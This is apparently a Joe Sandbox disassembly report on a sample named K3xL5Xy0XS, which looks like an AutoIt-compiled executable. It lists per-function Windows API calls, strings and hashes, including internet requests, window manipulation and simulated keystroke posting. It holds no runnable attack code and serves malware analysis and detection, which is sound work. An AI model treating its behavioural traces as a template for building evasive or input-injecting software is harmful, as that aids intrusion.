                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                  • String ID:
                                                                                  • API String ID: 2156557900-0
                                                                                  • Opcode ID: 1ca97732f502a8ec9447f0d335ded952bfd3f602b8154906188fb81c98df65f4
                                                                                  • Instruction ID: b4589a8d2aa0897504a2c1a1e2f77a1aa271897df1aa9e38e0e2c8814614d510
                                                                                  • Opcode Fuzzy Hash: 1ca97732f502a8ec9447f0d335ded952bfd3f602b8154906188fb81c98df65f4
                                                                                  • Instruction Fuzzy Hash: 7E31A971520315FFDB12DFA4FC4CB6E7BA9AB50312F208116FA04D61A0E7B49A60CF64
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 001F2C94
                                                                                    • Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
                                                                                    • Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0
                                                                                  • _free.LIBCMT ref: 001F2CA0
                                                                                  • _free.LIBCMT ref: 001F2CAB
                                                                                  • _free.LIBCMT ref: 001F2CB6
                                                                                  • _free.LIBCMT ref: 001F2CC1
                                                                                  • _free.LIBCMT ref: 001F2CCC
                                                                                  • _free.LIBCMT ref: 001F2CD7
                                                                                  • _free.LIBCMT ref: 001F2CE2
                                                                                  • _free.LIBCMT ref: 001F2CED
                                                                                  • _free.LIBCMT ref: 001F2CFB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: e23e8331f6c729daee5c5cba87d99ac40aea44e0865939d30f77dfdef3e6570c
                                                                                  • Instruction ID: b2fe26039fe0f897148931f9610684b90839389f733aeabb4f9eebb88fb769cc
                                                                                  • Opcode Fuzzy Hash: e23e8331f6c729daee5c5cba87d99ac40aea44e0865939d30f77dfdef3e6570c
                                                                                  • Instruction Fuzzy Hash: FF11A27614051DAFCB02EF94D882CED3BA9FF15354F8144A5FA489F222DB71EE509B90
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001C1459
                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 001C14F8
                                                                                  • UnregisterHotKey.USER32(?), ref: 001C16DD
                                                                                  • DestroyWindow.USER32(?), ref: 002024B9
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0020251E
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0020254B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                  • String ID: close all
                                                                                  • API String ID: 469580280-3243417748
                                                                                  • Opcode ID: 5c9addddfd5da66896ef35acf53427c4d95c749817ef1d47ed9e8d82b57ecf34
                                                                                  • Instruction ID: 207df48c45647858258c9c54c193fa45dc1a61727521d27929e514cc80377a3b
                                                                                  • Opcode Fuzzy Hash: 5c9addddfd5da66896ef35acf53427c4d95c749817ef1d47ed9e8d82b57ecf34
                                                                                  • Instruction Fuzzy Hash: BBD16931611212DFCB19EF14C899F29F7A4BF25700F65429EE84A6B292DB30ED26CF54
                                                                                  APIs
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00237FAD
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00237FC1
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00237FEB
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00238005
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00238017
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00238060
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002380B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                                  • String ID: *.*
                                                                                  • API String ID: 769691225-438819550
                                                                                  • Opcode ID: 987fed8732fbc759b8011f686de87b218a5d0fdae8116fa06f435b354761fb1d
                                                                                  • Instruction ID: 0f5542ecbde2b87f9e9298cb5415e4189a0ec47794b7dcc6ddde508dcbc50d40
                                                                                  • Opcode Fuzzy Hash: 987fed8732fbc759b8011f686de87b218a5d0fdae8116fa06f435b354761fb1d
                                                                                  • Instruction Fuzzy Hash: ED81A0F15283469BCB34EF14C884AAEB3E8BF98310F14486EF885D7250EB74DD558B52
                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 001C5C7A
                                                                                    • Part of subcall function 001C5D0A: GetClientRect.USER32(?,?), ref: 001C5D30
                                                                                    • Part of subcall function 001C5D0A: GetWindowRect.USER32(?,?), ref: 001C5D71
                                                                                    • Part of subcall function 001C5D0A: ScreenToClient.USER32(?,?), ref: 001C5D99
                                                                                  • GetDC.USER32 ref: 002046F5
                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00204708
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00204716
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0020472B
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00204733
                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002047C4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                  • String ID: U
                                                                                  • API String ID: 4009187628-3372436214
                                                                                  • Opcode ID: b7bf219481b2c988bbeb19652edab52b9063fac03e689687ef0d9d8592bbbb38
                                                                                  • Instruction ID: 43d5c7bdf4ee42429d804a88e5f5b2d4b106417dc8048ba6a688b2ac1cc26e5c
                                                                                  • Opcode Fuzzy Hash: b7bf219481b2c988bbeb19652edab52b9063fac03e689687ef0d9d8592bbbb38
                                                                                  • Instruction Fuzzy Hash: EE710070410306DFCF21AF64C984EBA7BBAFF4A320F148269EE555A1A6D331D8A1DF50
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002335E4
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • LoadStringW.USER32(00292390,?,00000FFF,?), ref: 0023360A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString$_wcslen
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 4099089115-2391861430
                                                                                  • Opcode ID: de7572f7065d769646e0024d4aef3edd52bbc6eb9e7974eba8eb55b144ac0aee
                                                                                  • Instruction ID: cd79487440c228f0df5716577c79db5de6dad7371ff23227144ea52393dbbe33
                                                                                  • Opcode Fuzzy Hash: de7572f7065d769646e0024d4aef3edd52bbc6eb9e7974eba8eb55b144ac0aee
                                                                                  • Instruction Fuzzy Hash: 60518FB191020ABADF15EBE0EC46EEDBB78AF24300F144169F115721A1EB315BA8DF64
                                                                                  APIs
                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0023C272
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0023C29A
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0023C2CA
                                                                                  • GetLastError.KERNEL32 ref: 0023C322
                                                                                  • SetEvent.KERNEL32(?), ref: 0023C336
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0023C341
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                  • String ID:
                                                                                  • API String ID: 3113390036-3916222277
                                                                                  • Opcode ID: 8b37d86808da78add987d0bc43f2555533712951e587ea0e53fb03e4f487896c
                                                                                  • Instruction ID: 8e29ffbd2792e62f63ebd087910a93348e82949efba251a3dfbeb37ea3a58fda
                                                                                  • Opcode Fuzzy Hash: 8b37d86808da78add987d0bc43f2555533712951e587ea0e53fb03e4f487896c
                                                                                  • Instruction Fuzzy Hash: E6317AB1620709AFD7219FA4DC88AAB7BFCEB49744F24851EF446E3200EB30DD159B65
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00203AAF,?,?,Bad directive syntax error,0025CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002298BC
                                                                                  • LoadStringW.USER32(00000000,?,00203AAF,?), ref: 002298C3
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00229987
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                  • API String ID: 858772685-4153970271
                                                                                  • Opcode ID: 2c4d4de412f64302689b956dfa5f587b8436dfb4468013b19d1cc2dbf87d843b
                                                                                  • Instruction ID: e6a51935c071fe75deac80c3aee0d92b4ed18c6c6b84adb0c62ac590ed9bc3e0
                                                                                  • Opcode Fuzzy Hash: 2c4d4de412f64302689b956dfa5f587b8436dfb4468013b19d1cc2dbf87d843b
                                                                                  • Instruction Fuzzy Hash: EF217C3191031ABBCF11AF90DC0AEEE7739BF29701F04446AF515660A2EB719668DB10
                                                                                  APIs
                                                                                  • GetParent.USER32 ref: 002220AB
                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 002220C0
                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0022214D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameParentSend
                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                  • API String ID: 1290815626-3381328864
                                                                                  • Opcode ID: e097cfc42e63698176c345abeb6654e03f633eae63bf7103acf7838b2209cd3c
                                                                                  • Instruction ID: cec73b497c572078437eee61b116831a7ed9cb9305def1d62593f748f2dfdbd7
                                                                                  • Opcode Fuzzy Hash: e097cfc42e63698176c345abeb6654e03f633eae63bf7103acf7838b2209cd3c
                                                                                  • Instruction Fuzzy Hash: 7D112B7A5A8737FAF6012660BC06DEA379CCF25734B200025F709A50D2FFA258355618
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                  • String ID:
                                                                                  • API String ID: 1282221369-0
                                                                                  • Opcode ID: a758113c20cb95315a78a2f5097acdef67a889f4a01c3f49fbad6621a4354c16
                                                                                  • Instruction ID: c88844b230d3df20c449772850790b0872b030d02031c2ec2b584e529b38bd6f
                                                                                  • Opcode Fuzzy Hash: a758113c20cb95315a78a2f5097acdef67a889f4a01c3f49fbad6621a4354c16
                                                                                  • Instruction Fuzzy Hash: 3C616A7190471DAFDB21AFB4A985A7EBBA6EF11310F04016EFB0197281DB319D0197E0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00255186
                                                                                  • ShowWindow.USER32(?,00000000), ref: 002551C7
                                                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 002551CD
                                                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 002551D1
                                                                                    • Part of subcall function 00256FBA: DeleteObject.GDI32(00000000), ref: 00256FE6
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0025520D
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0025521A
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0025524D
                                                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00255287
                                                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00255296
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                  • String ID:
                                                                                  • API String ID: 3210457359-0
                                                                                  • Opcode ID: 7b73626dc9621299d51515adbaf4b50ef99845ec1a4b09b607d88b1e366b16e2
                                                                                  • Instruction ID: 6d713d96890492d6c8262f9f50b9b9fd57f67cc335e3757f12b189e83322c598
                                                                                  • Opcode Fuzzy Hash: 7b73626dc9621299d51515adbaf4b50ef99845ec1a4b09b607d88b1e366b16e2
                                                                                  • Instruction Fuzzy Hash: 6F51CA30A70A29BEEF249F24CC59BD83B65EB05323F148011FD19D66E0C7B59968DF49
                                                                                  APIs
                                                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00216890
                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002168A9
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002168B9
                                                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002168D1
                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002168F2
                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00216901
                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0021691E
                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001D8874,00000000,00000000,00000000,000000FF,00000000), ref: 0021692D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 1268354404-0
                                                                                  • Opcode ID: b3c49f249685a304cb303ee94a239b993b996ca3d72bb3ac1100a6c23f413d79
                                                                                  • Instruction ID: ae293056048a17b3ab475bb1e41fc1b7300243d6908cbdf304fd0560415da1d7
                                                                                  • Opcode Fuzzy Hash: b3c49f249685a304cb303ee94a239b993b996ca3d72bb3ac1100a6c23f413d79
                                                                                  • Instruction Fuzzy Hash: D451BB7061030AEFDB24CF25DC99FAA7BB5FB58311F10451AF912972A0EB70E9A0DB50
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0023C182
                                                                                  • GetLastError.KERNEL32 ref: 0023C195
                                                                                  • SetEvent.KERNEL32(?), ref: 0023C1A9
                                                                                    • Part of subcall function 0023C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0023C272
                                                                                    • Part of subcall function 0023C253: GetLastError.KERNEL32 ref: 0023C322
                                                                                    • Part of subcall function 0023C253: SetEvent.KERNEL32(?), ref: 0023C336
                                                                                    • Part of subcall function 0023C253: InternetCloseHandle.WININET(00000000), ref: 0023C341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                  • String ID:
                                                                                  • API String ID: 337547030-0
                                                                                  • Opcode ID: 2fb6ef46abe919d695ef36cb96c36c219efa10268d657d391a73a80582d88846
                                                                                  • Instruction ID: 9a011a501cad8e7762f37a429b4ae8cddc3626bcd513ac2cc8966c2ded2e310d
                                                                                  • Opcode Fuzzy Hash: 2fb6ef46abe919d695ef36cb96c36c219efa10268d657d391a73a80582d88846
                                                                                  • Instruction Fuzzy Hash: 6C3183B1220705AFDB219FA5DC48A67BBF8FF58301F20441DF95696610D730E824DF60
                                                                                  APIs
                                                                                    • Part of subcall function 00223A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00223A57
                                                                                    • Part of subcall function 00223A3D: GetCurrentThreadId.KERNEL32 ref: 00223A5E
                                                                                    • Part of subcall function 00223A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002225B3), ref: 00223A65
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 002225BD
                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002225DB
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002225DF
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 002225E9
                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00222601
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00222605
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0022260F
                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00222623
                                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00222627
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2014098862-0
                                                                                  • Opcode ID: 8e89ba7497f1be6daa77a4b1cbc01d3d5001a36f4b70d0ffa63bdfbcc4f5c83c
                                                                                  • Instruction ID: fa4ca01893e5b70ee03ad09ee3b6b5976665c7f54ea39a1f56e46176487e1297
                                                                                  • Opcode Fuzzy Hash: 8e89ba7497f1be6daa77a4b1cbc01d3d5001a36f4b70d0ffa63bdfbcc4f5c83c
                                                                                  • Instruction Fuzzy Hash: A301D831790720BBFB106768AC8EF593F9DDB4EB12F604011F318AE1D1C9F214548A6D
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00221449,?,?,00000000), ref: 0022180C
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00221449,?,?,00000000), ref: 00221813
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00221449,?,?,00000000), ref: 00221828
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00221449,?,?,00000000), ref: 00221830
